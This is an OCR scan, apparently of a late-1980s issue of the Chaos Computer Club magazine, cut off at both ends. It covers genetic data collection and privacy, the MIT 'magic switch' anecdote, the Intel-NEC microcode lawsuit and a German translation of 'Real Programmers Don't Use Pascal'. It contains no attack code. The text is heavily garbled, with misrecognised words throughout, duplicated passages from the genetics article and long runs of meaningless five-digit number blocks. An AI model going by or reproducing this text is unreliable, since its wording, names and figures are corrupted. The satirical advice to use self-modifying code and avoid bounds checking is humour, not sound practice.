tution des Menschen. Anläßlich eines vom For-
schungsministerium initiierten Fachgesprächs im
Herbst 1983, vertraten die Hamburger Humangeneti¬
ker Prof. Werner Gödde und Prof. Dharam Agarwal
die Auffassung, daß die Erfassung der genetischen
Konstitution generell immer wichtiger erscheine. Sie
empfahlen einen sogenannten Pharmakogenetik-
Pass, der, nach dem Prinzip der Unfallschutzkarten,
dem behandelnden Arzt Anhaltspunkte über indivi¬
duelle Anfälligkeiten oder Resistenzen gegenüber be¬
stimmten Substanzgruppen geben soll.
Gen-Analyse im ArbeitslebcTi
72237 37ä96 l26ö5 5U54 6?^ 71439
Auch wenn dieser Vorschlag zunächst auf verhalte¬
nen Beifall stieß, im Rahmen berufsgenossenschaftli¬
cher Untersuchungen wird die genetische Analyse
durch Betriebsärzte zunehmend zur Alltagsroutine
werden. Nach Auffassung von Dr. Breitstadt. Werk¬
sarzt der Firma Höchst, wäre anbetracht der speziel¬
len Arbeitsplatzrisiken im Sinne des derzeitigen be¬
rufsgenossenschaftlichen Regclwcrkcs eine Dul¬
dungspflicht genetischer Untersuchungen anzusire-
ben.
Ein grundsätzliches Recht des Arbeitgebers, vor Ein¬
stellung ärztliche Untersuchungen zu verlangen, wird
nach derzeitiger Rechtslage nicht bestritten - zumin¬
dest nicht wenn es darum geht, Arbeitsplatzrisiken zu
erkennen. Zu erwarten ist, dass in Parallelität zum
psychologischen in Kürze auch genetische Eignung-
stesls eingeführt werden. Auf dieser Grundlage wer¬
den Arbeitsgerichte in erster Linie über Grenzen der
Zumutbarkeit zu befinden haben. Betont wird, dass
genetische Untersuchungen im Arbeitsleben grund¬
sätzlich auf Freiwilligkeit der zu Untersuchenden be¬
ruhen sollte.
Alternativen gesucht
4 1 278 88732“ 52737 339^ r2a90 506B4
In einem Schreiben an den Vorsitzenden der
Enquete-Kommi.ssion Gentechnik hat die Bundesve¬
reinigung der Huntington-Gruppen in der Bundesre¬
publik bereits im Februar darauf bestanden, daß aus¬
schließlich der Patient die Daten seiner genomanaly¬
tischen Untersuchung verwahren bzw. verwenden
27560
84414
73782
33032
70330
1 6823
7193b
43002
17323
5734?
359 4 7
56 4 33
41299
43024
35023
57322
14597
34328
26414
216S4
37S72
1 ti t -j -j
67010
61509
53241 38062 79602 59303 37727 69778
37923 68409 32536 53807 33983 45721
37460 21005 31143 33513 23850 04782
71693 76213 00490 47955 97959 29059
S>te S>atem^c]^lewber
Feature:
Der genetisch gläserne Mensch
Erbsubstanz in der RasteHahndung
75631 39997 22170 33046 17092 99457
Hamburg (cls) - Als die Kostcncxplosion iiii Gesund¬
heitswesen 1978 ölTeniliches Thema wurde, betrugen
die Gesamtausgaben für Gesundheit über 165 Mil¬
liarden Mark oder rund 20 Prozent des verfügbaren
Einkommens privater Haushalte. "Kostendämp-
fung" wurde zum gängigen Schlagwort der Diskus¬
sion, verbunden mit kontroversen Auseinander.set-
?:ungcn über Ausgestaltung und Konsequenzen des
beabsichtigten Sparkurses. Wesentliche Vorau.sset-
zung der angepeilten Steuerungsversuche war die
“Verbesserung der Datenlage“, heif3l. die Kassen, die
sich zudem mit einem wachsenden Anteil an chroni¬
schen. sozial- und umweltbedingten Krankheiten
konfrontiert sahen, konstatierten einen wesentlich
erhöhten Bedarf an Sozial- und Gcsundheiisdalen.
Geplant'wurde ein maschinenlesbarer Versicherie-
nausweis der mit ebenfalls maschinenlesbaren For¬
mularen gekoppelt werden sollte. Ein neu cinzufüh-
render Paragraph 319 der Rcichsversicherungsord-
nung (RVO), sollte die rechtlichen Grundlagen dieses
sogcnanT^ten' Trunsparenzprojekies“ schaffen. Nach
einer Felderprobung in Schleswig-Holstein wurde
das Vorhaben jedoch zunächst verworfen. Allerdings
nicht aus datenschutzrechtlichcn. sondern vor allem
wegen ökonomischer Bedenken.
ost en-N ulzcn-Rechnungen
mit_paien über Erbgut?
90962 716ö2‘26Ö74'07ia7 49975 35921
Der dahinter stehende Wunsch nach deiailhericn (n-
formalionssysiemen ist damit aber nicht vom Ti.sch.
Im Gegenteil! Dem Kassenarzt werden unter Beru¬
fung auf Paragraph 368 RVO bereit.s über 80 vorge¬
druckte Bescheinigungen und detalllerte Berichte
über seine Patienten abverlangi. was im Einzelfall
bedeuten kann, daß der Patient vor der Alternative
steht, entweder auf die Wahrung seiner Inlimdaten
oder auf wirksame Hilfe zu verzichten.
Oie Forderung nach mehr Effektivität und Effizienz
hat auch im Gesundheitswesen zunehmend Kosten-
Nutzen- Rechnungen aufkonimcn lassen. Der Prä¬
ventivmedizin wurde wach.sende Bedeutung beige-
mes.sen. Der steigende Anteil umweltbedinger
Krankheiten hat zudem eine neue medizinische Dis¬
ziplin auf den Plan gerufen, die sogenannte ökogene-
lik. Sie untersucht Wechselwirkungen zwischen Erbe
und Umwelt, in.sbesondcre Wirkungen potentiell
erbgutverändernder Stoffe auf die genetische Konsti¬
tution des Menschen. Anläßlich eines vom For-
schungsministerium initiierten Fachge.sprüch.s im
Herbst 198.3, vertraten die Hamburger Humangeneti¬
ker Prof, Werner Gödde und Prof. Dharam Agarwal
die Auffassung, daß die Erfassung der genetischen
Kon.stitution generell immer wichtiger erscheine. .Sie
empfahlen einen .sogenannten Pharmakogenetik-
Pas.s. der, nach dem Prinzip der Unfalischutzkarten.
dem behandelnden Arzt Anhaltspunkte über indivi¬
duelle Anfälligkeiten oder Resistenzen gegenüber be¬
stimmten Substanzgruppen geben soll.
27560 B441'5 73732 j3ö- 32 70.330 löd23
71?.3ö 43302 1 7.323 57.349 3594 7 564.33
4129? 4.3024 950:3 57.3:: J 4597 34320
;'64I4 37S72 1L7Z: 67010 61509
X>aten^c^leuber
Gen-Analyse öffentlicher Gesuiidheiisvorsorßc
4243A 56984 40187 33128 10107 94512
/Mlgemein stellt sich die Frage, wer in welchem Um¬
fang Daten der öffentlichen Gesundheitsfürsorge
oder kassenärztlichen .Abrechnung erheben und of¬
fenbaren darf. Wer, zu welchen Zweck Zugriff be¬
kommt - und, unabhängig von solchen formaien Kri¬
terien, welche Schlussfolgerungen aus dem Datenma¬
terial von wem zu welchem Zweck gezogen werden.
Kritiker versichern, dass beispielsweise in der Ham¬
burger Gesundheitsbehörde und dem Tumorzenirum
in Hamburg Eppendorf eine Behinderienkartei ge¬
führt werde, in der ca. 2000 Menschen erfa.sst sind.
Erkennbare Fehlbildungen hei der Geburt werden
automatisch beim Statistischen Bundesamt in Wies¬
baden ausgeweriet. Aus anderen Unterlagen gehe
hervor, daß in Europa alle Mil3bildungen nach ein¬
heitlichen Kriterien erfasst werden sollen.
Nach Auffassung von Prof. Dr. Bernd Klees, werde
eine umfassende prä- und postnatale genetische An¬
alyse in naher Zukunft die Grundlage individueller
Gen-Karten und zentralisierter Genkarteien liefern,
die die Mehrzahl unserer Bevölkerung einer totalen
Kontrolle unterwerfen werde. “Das Konstrukt der
■informationellen Selbstbestimmung’“, so Klees,
■'wird dann nur noch eine hilflose Verteidigungslinie
sein. Die’Volkssählungsdebatie' wäre gegen über den
'Gen- Debatte' nur ein gleichsam harmloses Prälu¬
dium“. Die bayrischen Vorstöße zur AIDS- Mcidep-
nicht, geben einen Vorgeschmack auf künftige Ent¬
wicklungen.
Gcn-Analvse im Arbeitslcbcu
72237 37336'12605 81656 ^053 71439
Auch wenn dic.ser Vorschlag zunächst auf verhalte¬
nen Beifall stieß, im Rahmen berufsgenosscnschaftli-
eher Untersuchungen wird die genetische Analyse
durch Beiricbsärzte zunehmend zur Alltagsroutme
werden. Nach Auffassung von Dr. Breilstadt. Werk-
sarzt der Firma Höchst, wäre anbetrachl der speziel¬
len Arbeiisplatzrisiken im Sinne des derzeitigen be-
rufsgenos.sen.schaftlichen Regelwerkes eine Dul-
dungspflichl genetischer Untersuchungen anzusire-
hen.
Ein grundsätzliches Recht des Arbcilgehers. vor Ein¬
stellung ärztliche Untersuchungen zu verlangen, w’ird
nach derzeitiger Rechi.slage nicht bestrillen - zumin¬
dest nicht wenn es darum geht, Arbeiisplatzrisiken zu
erkennen. Zu erwarten ist. dass in Parallelität zum
psychologischen in Kürze auch gencti.sche Fignung-
stests eingeführt werden. Auf dieser Grundlage wer¬
den Arbeitsgerichte in erster Linie über Grenzen der
Zumutbarkeit zu befinden haben. Betont wird, dass
genetische Untersuchungen im Arbeitsleben grund¬
sätzlich aufFreiw'illigkeit der zu Untersuchenden be¬
ruhen sollte,
Alternativen gesucht
61773 ag732^27:.7 38903 r2390 50606
In einem Schreiben an den Vorsitzenden der
Enquete-Kommission Gentechnik hat die Bunde.sve-
reinigung der Huntington-Gruppen in der Bundesre¬
publik bereits im Februar daraufbe-standen, daß au.s-
-schließlich der Patient die Daten seiner genomanaly-
lischen Untersuchung verwahren bzw. verwenden
53241 33D62 79602 59.303 3772? 69779
.37923 69409 .325-36 53907 -33983 4572J
374i0 JH43 2:a5e 34732
76213 00490 47955 97959 27059
Der magische Schalter
aus: FORTHTREE Hamburg
Vor ein paar Jahren schnüffelte ich in den
Vitrinen, in denen die PDP-10 des MIT Artificial
Intelligence Lab' untergebracht war, und ich
bemerkte einen kleinen Schalter, der an den
Rahmen einer der Vitrinen geklebt war. Es war
offensichtlich ein in Heimarbeit zusammenge¬
basteltes Ding, das einer der Hardware Hacker
des Labors (keiner wußte, wer) angebracht
hatte.
Man faßt keinen unbekannten Schalter an
einem Computer an ohne zu wissen, was pas¬
siert, denn man könnte einen Absturz herbei¬
führen. Der Schalter war auf höchst unh ilfreiche
Weise beschriftef. Es gab zwei Stellungen, und
mit Bleistift war auf das Metall des Schalters
gekritzelt “magic" und “more magic“. Der Schal¬
ter war auf "more magic“ gekippt. Ich bat einen
anderen Hacker, sich das anzusehen. Auch er
hatte den Schalter noch nie gesehen. Eine
genauere Untersuchung ergab, daß bloß EIN
Draht zudem Schalterführte! Das andere Ende
des Drahts verschwand in der Leitungswirrnis
im Inneren des Computers, aber es ist eine
grundlegende Tatsache von Elektrizität, daß
ein Schalter nichts bewirkt, so lange nicht ZWEI
Drähte an ihm angeschlossen sind. Dieser
Schalter hatte einen Draht, der an der einen
Seite angeschlossen war, und keinen Draht an
der anderen Seite.
Es war klar, daß dieser Schalter irgendjeman¬
des Vorstellung von einem billigen Witz ent¬
sprungen war. Bestärkt in unserer Überzeu¬
gung, daß der Schalter unwirksam war, legten
wirihn um. Der Computer stürzte augenblicklich
ab.
Man stelle sich unser vollkommenes Erstaunen
vor. Wir verbuchten es als Zutall, kippten aber
nichtsdesfotrotz den Schalter auf die “more
magic“-Position, bevor wir den Computer wie¬
der hochfuhren.
Ein Jahr später erzählte ich die Geschichte
einem anderen Hacker - David Moon, wenn ich
mich recht erinnere. Er zweifelte natürlich an
meinem Verstand oder nahm an, ich würde an
eine übernatürliche Macht in diesem Schalter
glauben, beziehungsweise erdachte, ich toppe
ihn mit einem Märchen. Um ihn zu überzeugen,
zeigte ich ihm den Schalter, der immer noch an
derselben Stelle angeklebf war, mit bloß einem
Draht, der zu ihm führte. Er war immer noch in
der “more magic“-Stellung. Wir prüften den
Schalter und seine einsame Verbindung und
fanden, daß das andere Ende des Drahts, fest
verbunden mit der Computerverdrahtung, mit
einem ground pin verbunden war. Das machte
X>CLten4cl^teuber
den Schalter doppelt nutzlos: er war nicht nur
elektrisch inoperabel, sondern auch noch ver¬
bunden mit einem Teil, das niemals irgendwie
oder irgendwas bewirken würde. Also legten wir
den Schalter um.
Der Computer stürzte augenblicklich ab.
Diesmal gingen wir zu Richard Greenblatt,
einem allgedienten MIT-
Hacker, der grade da war. Auch ihm war der
Schalter nie zuvor aufgefallen. Er inspizierte
ihn, kam zu dem Schluß, daß er nutzlos ist,
brachte einen Seitenschneider und machte ihn
raus. Anschließend fuhren wir den Rechner
hoch und alles lief wie geschmiert.
Wir wissen immer noch nicht, wie der Schalter
die Maschine zum Absturz brachte. Es gibt eine
Theorie, daß ein vernachlässigbar kleiner
Strom an dem ground pin herrscht und das
Umlegen des Schalters die elektrische Leistung
genügend verändert, um den Strom soweit zu
beeinträchtigen, daß Millionstelsekunden-
Pulse durchlaufen. Aber wir sind nicht sicher.
Alles was wir sagen können ist, daß der Schal¬
ter magisch war.
Ich habe den Schalter immer noch bei mir zu
Hause. Vielleicht bin ich verrückt, aber ich habe
ihn gewöhnlich auf “moie magic“ gekippt.
Übersetzung ins Deutsche von Peter Glaser.
77751
9329? 94213
72772
11253
34 360
37158
34 335 ö 2 6 9 6
16619
8B572
52661
22Ci7
9754B 62106
20836
49382
91045
47.152
01529 93209
25030
0549B
25704
Laserbriefe
An die
Redaktion “Bratenschleuder“
Chaos Computer Club
Sehr geehrte Redaktion “Bratenschleuder",
Hiermit bestelle ich das Programmpakettürden
C64 zu 2.50 DM.
Das Programmpaket enthält:
Tomatomat Plus
1-2-Dry
Tea Base I
2,50 DM liegen in Briefmarken bei.
PS.: Bin begeisterter Computer-Freak!
Neue Runde im Prozessorkrieg
Ende Septmeber letzten Jahres feierte Silicon Valley
einen großen Sieg. In dem Copyright-Prozeß zwi¬
schen Intel und NEC mit Intel als Kläger hatte Rich¬
ter William A. Ingram vom District Court in San Jose
endlich ein Urteil gefällt. Er erklärte, wie Intel bean¬
tragt hatte, den Microcode von Microprozessoren als
Software. Damit fiel er unter das amerikanische Co¬
pyright. Alle Intel-Prozessoren der acht-, sechzehn-
und zweiunddreißig-Bit-Klasse, weltbekannt unter
den Zifferncodes 8088,8085,80186, 80286 und 80386,
dürfen laut Ingrams Spruch nicht derart nachemp¬
funden werden, daß sie mit den Intel-Produklen
kompatibel sind.
Damit erklärte der Richter die als V-Serie eingeführ-
len Eigenentwicklungen von NEC zu Makulatur,
zumindest für amerikanisches Territorium. "Alle
künftigen Produkte mit einem Microcode dürfen
nicht kopiert werden", so machte Intel-Anwalt F.
Thomas Dunlap die Tragweite des Urteils deutlich.
Die Japaner, reich an Speichern, arm an Logik, zogen
daraus Schlußfolgerungen, wie sie ihrem flexiblen
Wesen entsprechen: Sie fragten nach Lizenzen an.
Doch was im Zuge der Verkaufswelle für die 16-Bit-
CPU’s noch möglich war, ist im anlaufenden 32-Bit-
Geschäfl ein Tabu. War Hitachi noch vor Motorola
Fujitsu wie auch Mitsubishi und Oki Electric noch
von Intel großzügig mit Second-Source- Lizenzen für
den Kampf um die Ausbreitung der beiden amerika¬
nischen 16-Bit-Welten bedacht worden, so ist der Li¬
zenzladen für die Mächtigen - vorerst - geschlossen.
Hier haben Motorola einen Markanteil von 57 Pro¬
zent, und Intel bereits 30 Prozent zu verteidigen.
Die Prozessoren selber generieren zwar nur relativ
geringen Umsatz. So kostet die frisch auf den Markt
geworfene32-Bit CPU 80386 von Intel derzeit um die
400 Dollar, dürfte aber bald in höheren Stückzahlen
auf250, und in fünf Jahren auf 25 Dollar fallen. Doch
nicht der Prozessor selber ist das entscheidende Ge¬
schäft, sondern die Halbleiterperipherie, die er
kreiert. Mit ihr muß ersieh verstehen, und so müßten
sich auch Fremdarbeiter an die Spielregeln eines
Produktes halten, auf das sie keinen Einfluß haben.
Die Japaner ließen sich von Richter Ingram nicht ins
Bockshorn Jagen. Hitachi und Fujisu beschlossen
Ende Oktober letzten Jahres kurzerhand, selber in
dieses mühsame Geschäft einzusteigen. Nicht wegen
der Technologie ist die Prozessor-Produktion so ver¬
trackt. Die Missionsarbeit für das passende Betriebs-
.system macht wegen ihres ungewissen Ausgarigs das
Prozessorgeschäft so risikoreich. Dabei sind die Vor¬
aussetzungen für einen 32-Bit-Prozessor in Japan na¬
hezu ideal. Die Insel - gilt mit rund vier Millionen In¬
stallation - als ein Workstation-Wunderland, in dem
unweigerlich Motorola und Intel den Ton angeben
würden. Der Markt wäre also vorhanden. Nur bei
dem Betriebssystem, das der neue Typ des Joint- Ven-
ture.s unterstützen soll, herrscht noch Unklarheit. Von
einer Unix-Schnittstelle ist die Rede, aber auch von
TRON (The Real-Time Operating System Nucleus),
das als 'revolutionär' gepriesen wird und besonders
auf japanische Bedürfnisse (Mehrspi;achenverabei-
tung) zugeschnitten sein soll. Auch die technischen
Grunddaten werden bereits gehandelt: 700000 Tran¬
sistoren. 128 -KB-Stack-Cache, l-KB- Instructions-
Cache, 16 Register und 64 MB Hauptspeicher.
Allerdings geisterte im Gefolge des Prozesses zwi¬
schen NEC und Intel auch schon ein 32-Bil Micro-
prozessor als Originalentwicklung von NEC. Nach
seiner technischen Beschreibung wäre er unschlagbar
gewesen. Aber Hitchi und Fujitsu scheinen der Reali¬
tät näher zu sein. Wenn Fujitsu sich zu 80 Prozent bei
Fairchild einkaufen darf, ist ein ausgereifter 32-Bit-
Prozessor in diesem Halbleiter- Einkaufskorb enthal¬
ten. a. nony
CPUKRI19.DOC 19870.126 14.10
33905
53570
16865
31205
26495
61485
72492
57386
20691
74036
95213
53375
25316
66345
46658
85972
86659
45113
64413
70331
39367
21185
f>9553
95210
84594
07244
32383
55860
63186
80696
49248
51252
63269
95146
03596
03729
72531
98368
42336
39046
32136
71011
61928
21711
15028
28016
04438
05880
23820
31981
49309
63695
96735
93274
20249
88245
68494
12738
60566
49135
25267
06046
23445
05492
275BI
15170
93149
21879
59271
30019
40968
86698
69370
37302
20047
53143
38191
09278
80300
1 7205
93553
05207
00706
07223
Real Programmers Don’t Use PASCAL
A.FtLue
Im Goldenen Zeilalter des Computerns war es
einfach, die Männer (bisweilen richtige Män¬
ner' genannt) von den Bubis (bisweilen ’Müs-
lifresser’ genannt) zu unterscheiden. Zu dieser
Zeit waren die Richtigen Männer die, die etwas
vom Programmieren verstanden und die Müs¬
lifresser die, die nichts kapierten. Ein Richtiger
Computerprogrammierer sagte Sachen wie:
“D0101=1,10“ und: “ABEND,“ und der Rest der
Welt sagte: “Computer sind mir zu kompliziert“
und: "Ich habe keine BEZIEHUNG zu Compu¬
tern - sie sind so unpersönlich“. Ein voraus¬
schauendes Werk, B.Feirstein’s “Richtige Män¬
ner essen kein Müsli“, ein Taschenbuch aus
dem Jahre 1982, wies darauf hin, daß Richtige
Männer sich auf nichts beziehen und au ßerdem
keine Angst davor haben, unpersönlich zu sein.
Aber die Zeiten ändern sich. Heute sehen wir
eine Welt, in der kleine ältere Damen einen
computerisierten Mikrowellenherd haben,
zwölfjährige Kids einen Richtigen Mann bei
Asteroids oder PacMan spielend in die Tasche
stecken, und jedermann seinen höchstper¬
sönlichen Personal Computer kaufen und ver¬
stehen kann. Der Richtige Programmierer droht
von Studenten mit TRASH-80em deklassiert zu
werden!
Es gibt, wie auch immer, Unterschiede zwi¬
schen dem typischen jugendlichen PacMan-
Spieler und einem Richtigen Programmierer.
Diese Unterschiede zu begreifen, könnte den
Kids eine Perspektive geben - ein Persönlich¬
keitsbild, eine Vaterfigur. Außerdem würde es
deutlich machen, daß weiterhin Richtige Pro¬
grammierer gebraucht werden.
S>aten^cl^Cewber
Der einfachste Weg, um zu bestimmen, wer die
Richtigen Program
mierer sind, geht über die Programmierspra¬
che, die sie verwenden. Richtige Program¬
mierer verwenden FORTRAN. Müslifresser
verwenden Pascal. Nicklaus Wirth, der Erfinder
von Pascal, wurde einmal gefragt “Wie spre¬
chen Sie Ihren Namen aus?“. “You can either
call me by name, pronouncing it 'Veert', or call
me by value, 'Worth'“, sagte er. Man kann aus
dieser Antwort unmittelbar ersehen, daß Nic¬
klaus Wirth ein Müslifresser ist. Die einzige
Form der Werteübergabe, die ein Richtiger Pro¬
grammierer gutheißt, ist call-by-value-return,
wie es in den IBM/370 FORTRAN G- und H-
Compilern implementiert ist. Richtige Pro¬
grammierer haben keine abstrakten Konzepte
nötig, um ihre Arbeit zu erledigen; sie sind
vollkommen glücklich mit einer Lochkarten¬
stanze, einem FORTRAN IV-Compiler und
einem Bier. Richtige Programmierer program¬
mieren Listenverwaltunq, Strinqmanipulation,
Buchführung (falls sie es überhaupt machen)
und Künstliche Intelligenz in FORTRAN.
Wenn Du es nicht in FORTRAN machen
kannst, mach es in Assembler, Wenn Du es
nicht in Assembler machen kannst, ist es nicht
wert, gemacht zu werden.
Akademische Informatiker sind in den letzten
Jahren zunehmend dem strukturierten Pro¬
grammieren verfallen. Sie sagen, daß Pro¬
gramme viel einfacher zu verstehen sind, wenn
man spezielle Techniken und Sprachkon-
struktionen benutzt. Welche Konstruktionen
genau, darüber sind sie sich nicht ganz einig,
und die Beispiele, die sie bringen, um ihre
Ansichten zu belegen, passen immer auf je¬
weils eine Seite irgendeiner obskuren Zeit¬
schrift,
Als ich mit der Schule fertig war, dachte ich, daß
ich der beste Programmierer der Welt bin. Ich
konnte ein unschlagbares Tic-Tac-
Toe-Programm schreiben, fünf verschiedene
Programmiersprachen verwenden und 1000
Zeilen lange Programme abtassen, die funk¬
tionierten. Dann geriet ich ins Richtige Leben
hinaus. Meine erste Aufgabe war, ein 200.000
Zeilen langes FORTRAN-Programm zu lesen
und zu verstehen, um es anschließend um
einen Faktor zwei zu beschleunigen. Jeder
Richtige Programmierer wird dir sagen, daß
kein strukturierter Code der Welt dir dabei hel¬
fen wird, ein Problem wie das zu lösen - dazu
braucht man wirkliches Talent.
Einige Anmerkungen zu Richtigen Program¬
mierern und strukturierter Programmierung:
-Richtige Programmierer haben keine Angst,
GOTO's zu verwenden;
-Richtige Programmierer können fünf Seiten
lange DO-Schleiten schreiben ohne nervös zu
werden;
-Richtige Programmierer lieben arithmetische
IF-Statements, weil sie den Code interessanter
machen;
-Richtige Programmierer schreiben selbstmo¬
difizierenden Code, speziell wenn sich dadurch
20 Nanosekunden im Inneren einer engen
Schleife einsparen lassen;
-Richtige Programmierer brauchen keine Kom¬
mentierungen: Der Code spricht für sich;
-Daß FORTRAN keine strukturierten IF, RE-
PEAT...UNTIL oder CASE-
Statements kennt, braucht einen Richtigen Pro¬
grammierer nicht zu sorgen. Nebenbei, man
kann sie nötigenfalls simulieren durch zuge¬
wiesene GOTO’s.
‘'Datenstrukturen“ gehen seit kurzer Zeit auch
durch die Presse. Abstrakte Datentypen. Struk¬
turen, Pointer, Listen und Strings sind in be¬
stimmten Kreisen populär geworden. Wirth, der
Müslifresser, hat ein ganzes Buch geschrieben
('Algorithms + Data Structures = Programms',
Prentice Hall, 1976), das behauptet, man könne
Programme basierend aut “Datenstrukturen''
schreiben, anstatt die anderen Wege zu be¬
nutzen. Wie jeder Richtige Programmierer
weiß, ist der einzige nützliche Datentyp der
Array. Strings, Listen, Strukturen und Mengen
sind alles spezielle Fälle von Arrays und können
als solche behandelt werden, ohne einem die
Programmiersprache zu komplizieren. Das
Schrecklichste an den wunderlichen Datenty¬
pen ist, daß man sie deklarieren muß; Richtigen
Programmiersprachen implizit ist - wie wir alle
wissen - eine Schreibweise, die aut dem ersten
Buchstaben des sechs Zeichen langen Varia¬
blennamens basiert.
Was für eine Art Betriebssystem verwendet ein
Richtiger Programmierer? CP/M? Gott behüte.
Im Grunde ist das ein Spielzeug-Betriebssys¬
tem. Auch kleine ältere Damen und Ober¬
schüler können CP/M benutzen und verstehen.
Unix ist selbstverständlich ein wenig kompli¬
zierter - der typische Unix-Hacker wei ß nie, wie
der PRINT-Befehl diese Woche heißt - aber
wenn’s um die Wurst geht, ist Unix ein herrli¬
ches Videospiel. Die Leute machen nichts se¬
riöses aut Unix-Systemen: sie schicken
Scherzchen via USENET um die Erde oder
schreiben Adventure Games und For¬
schungsberichte.
Nein, der Richtige Programmierer verwendet
OS/370. Ein guter Programmierer kann die Be¬
schreibung eines lJK305l-error, der grade auf¬
getreten ist, in seinem JLC-Handbuch finden
und verstehen. Der großartige Programmierer
kann JCL schreiben ohne einen Blick ins Hand¬
buch zu werfen. Ein wirklich außergewöhnli¬
cher Programmierer kann Bugs finden, die in
sechs Megabyte Core Dump vergraben sind,
ohne auch nur einen Hex-
Taschenrechner zu benutzen.
OS/370 ist ein wahrhaft bemerkenswertes Be¬
triebssystem. Es ermöglicht die Vernichtung
der Arbeit von einigen Tagen durch einen ein¬
zigen falsch gesetzten Blank, also ist es beim
Programmieren angesagt, aufgeweckt zu sein.
Die beste Art, an das System ranzugehen, ist
über eine Lochkartenstanze. Einige Leute be¬
haupten, es gäbe ein Timesharing System, das
auf OS/370 läuft, aber nach sorgfältigen Stu¬
dien bin ich zu der Ansicht gelangt, daß sie
unrecht haben.
Was für Tools benutzt der Richtige Program¬
mierer? Theoretisch kann ein Richtiger Pro¬
grammierer seine Programme zum Laufen brin¬
gen, indem er sie direkt über die Schalttafel in
den Computer eingibt. In den frühen Tagen, als
die Computer noch Schalttafeln hatten, wurde
das gelegentlich so gemacht. Der typische
Richtige Programmierer hat den gesamten
Bootstrap Loader in Hex im Gedächtnis und gibt
ihn neu ein, wenn er von seinem Programm
zerstört worden ist. In dieser Zeit war Speicher
noch Speicher - er verschwand nicht, wenn der
Strom weg war. Heutzutage vergißt der Spei¬
cher Dinge, auch wenn du es nicht willst, oder
er behält Dinge, die er längst hätte vergessen
sollen.
Die Legende sagt, daß Seymour Cray, der
Erfinder des Cray I Supercomputers und der
meisten Control-Data-Computer, das erste Be¬
triebssystem für die CDC 7600 aus dem Ge¬
dächtnis über die Schalttafel eingab, als sie
zum ersten Mal hochgefahren wurde. Cray ist
selbstverständlich ein Richtiger Programmie¬
rer.
Einer meiner Lieblings-Richtige-Program-
mierer war Systemprogrammierer bei Texas
Instruments. Eines Tages erreichte ihn ein
Ferngespräch von einem User, dessen System
mitten in einer wichtigen Arbeit zusammenge¬
brochen war. Jim behob den Schaden über das
Telefon, indem erden User dazu brachte, Disk
I/O-Instruktionen über die Schalttafel einzuge¬
ben, nach seinen Anweisungen System Tables
in Hex zu reparieren und Registerinhalte aus¬
zulesen. Die Moral dieser Geschichte: Obwohl
ein Richtiger Programmierer nützlicherweise
eine Lochkartenstanze und einen Printer zu
seinem Werkzeug zählt, kann er im Notfall mit
einer Schalttafel und einem Telefon auskom-
men.
^POST
Tomteboda prk 2
42
GÖTEBORG BAN
trans
ln einigen Firmen besteht das Edieren von
Programmtext nicht länger darin, daß zehn In¬
genieure Schlange stehen, um eine 029-
Lochkartenstanze zu benutzen. Tatsächli'ch ist
es so, daß in dem Gebäude, in dem ich arbeite,
keine einzige Lochkartenstanze steht. Oer
Richtige Programmierer hat in dieser Situation
seine Arbeit mit einem Text Editor-Programm
zu machen. Die meisten Systeme sind mit ver¬
schiedenen Editoren ausgestattet, aus denen
man wählen kann, und der Richtige Program¬
mierer muß achtgeben, daß er sich den aus¬
sucht. der seinem persönlichen Stil entspricht.
Viele Leute glauben, daß die besten Editoren
der Welt im Xerox Palo Alto Research Center,
zur Verwendung auf Altos- und Dorado-
Computern geschrieben werden. Unglückli¬
cherweise wird kein Richtiger Programmierer
jemals einen Computer mit einem Betriebssy¬
stem benutzen, das SmallTalk heißt, und er
wird dem Computer bestimmt keine Mitteilun¬
gen mit einer Maus machen.
63990
57171
15370
99635
77735
90371
96205
06114
65148
37526
20956
5:;-U7
13290
02599
43976
63114
54590
;'i35S
98979
1 15 8.3
70934
19370
44115
51:19
20117
] 6 4 58
05669
45933
13113
6jö2ß
62734
63184
90346
29395
00294
53341
16432
41149
69753
32681
13087
31699
4 2.739
35869
66295
71241
02732
3?i:.s
74175
492.28
71362
45454
72228
39552
7.752?
52402
45 ? 0.3
80.574
15026
92246
3862S
5.1265
42211
81572
1|1
62239
11205
21464
39085
10009
Einge der Konzepte dieser Xerox Editoren sind
in Editoren aufgenommen worden, die auf Be¬
triebssystemen mit etwas vernünftigeren Be¬
zeichnungen wie etwa EMACS oder VI laufen.
Das Problem mit diesen Editoren ist, daß Rich¬
tige Programmierer meinen, ’what you see is
what you gef sei ein schlechtes Konzept für
Text Editoren. Der Richtige Programmierer will
einen ’you asked for it, you got if-Editor; einen,
der kompliziert, kryptisch, mächtig, unnach¬
sichtig und gefährlich ist. TECO, um genau zu
sein.
Man hat festgestellt, daß eine TECO-
Kommandofolge eher an Zeichensalat durch
Übertragungsrauschen erinnert als an lesbaren
Text. Eines der unterhaltsamsten Spiele mit
TECO besteht darin, daß man seinen Namen
als Kommandozeile eintippt und Vermutungen
darüber anstellt, was dadurch passiert. So gut
wie jeder mögliche Tippfehler bei der Kommu¬
nikation mit TECO wird kurzerhand dein Pro¬
gramm zerstören, oder schlimmer noch, subtile
und mysteriöse Bugs in Subroutinen schleu¬
sen, die einst funktioniert haben.
Aus diesem Grund widerstrebt es Richtigen
Programmierern, ein Programm zu edieren,
das kurz davor steht, zu funktionieren. Sie fin¬
den es viel einfacher, den binären Objektcode
direkt zu patchen, indem sie ein wunderbares
Programm benut 2 er;i, das SUPERZAP (oder
das entsprechende Äquivalent auf nicht-IBM-
Maschinen) heißt. Das funktioniert so gut, daß
viele Programme, die auf IBM-Systemen lau¬
fen, keinerlei Verwandtschaft mehr mit dem
original FORTRAN-Code haben. In einer An¬
zahl von Fällen ist der Source Code nicht länger
verfügbar. Wenn es an der Zeit ist, ein derar¬
tiges Programm zu fixieren, wird kein Manager
jemand geringeren als einen Richtigen Pro¬
grammierer mit dem Job betrauen - kein müs¬
lifressender strukturierter Programmierer wür¬
de wissen wo anfangen. Das nennt man Ar¬
beitsplatzsicherung.
Einige Programmier-Tools, die nicht von Rich¬
tigen Programmierern benutzt werden:
-FORTRAN-Präprozessoren wie MORTRAN
und RATFOR. Derartige Programmierrezepte
sind gut zum Müslimachen;
-Source Language Debugger. Richtige Pro¬
grammierer können Core Dumps lesen;
-Compiler mit Array Bounds Checking. Sie er¬
sticken die Kreativität, vernichten die meisten
der interessanten Ver
wendungsweisen für EOUIVALENCE und ma¬
chen es unmöglich, den Befriebssystemcode
cl&Cewber
mit negativen Vorzeichen zu modifizieren. Das
Schlimmste: Bounds Checking ist ineffizient.
-Source Code-Pflegesysteme. Ein Richtiger
Programmierer hält seinen Code in einem Kar¬
teikasten verschlossen, denn er geht davon
aus, daß der Eigentümer seine wichtigen Pro¬
